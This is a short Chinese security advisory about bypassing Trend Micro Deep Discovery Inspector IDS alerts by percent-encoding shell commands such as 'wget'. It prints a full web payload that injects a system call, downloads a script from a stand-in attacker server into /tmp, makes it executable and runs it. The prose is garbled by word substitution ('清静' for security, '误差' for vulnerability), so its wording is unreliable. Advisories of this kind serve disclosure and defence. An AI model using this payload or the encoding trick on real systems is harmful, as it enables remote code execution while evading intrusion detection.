Trend Micro Deep Discovery Inspector IDS清静绕过误差清静通告

宣布时间 2019-07-26

误差编号和级别


CVE编号:暂无 ,危险级别:高危 ,CVSS分值:官方未评定


影响版本


受影响的版本


Trend Micro Deep Discovery Inspector IDS


误差概述


Trend Micro Deep Discovery Inspector IDS 是一种网络装备 ,可监控所有类型和凌驾105种差别的网络协议 ,以发明收支网络的高级威胁和有针对性的攻击。2019年7月24日 ,研究职员披露了Trend Micro Deep Discovery Inspector IDS 清静绕过误差的详情。清静绕过误差源于网络系统或产品中缺少内容验证规则或对内容验证强度缺乏。


误差验证


经太过析 ,IDS发明恶意系统下令(如“Wget  Commandline  Injection”)会发出警报 ,并且将它们标记为高危害。攻击者将payload与通俗的ascii字符一起发送 ,例如“wget” ,纵然它们举行了如“\ x77 \ x67 \ x65 \ x74”的编码 ,仍会发出警报。可是 ,攻击者可以通过在HEX中以百分号字符“%”开头的恶意下令来轻松绕过这些警报 ,例如 ,“%77% 67%65%74”也转换为“wget” ,不但不会被标记或忠言 ,也可以在目的系统上执行。


Payload:


/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&v ars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O% 20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a


修复建议


关注官方网站 ,实时下载补丁更新。


参考链接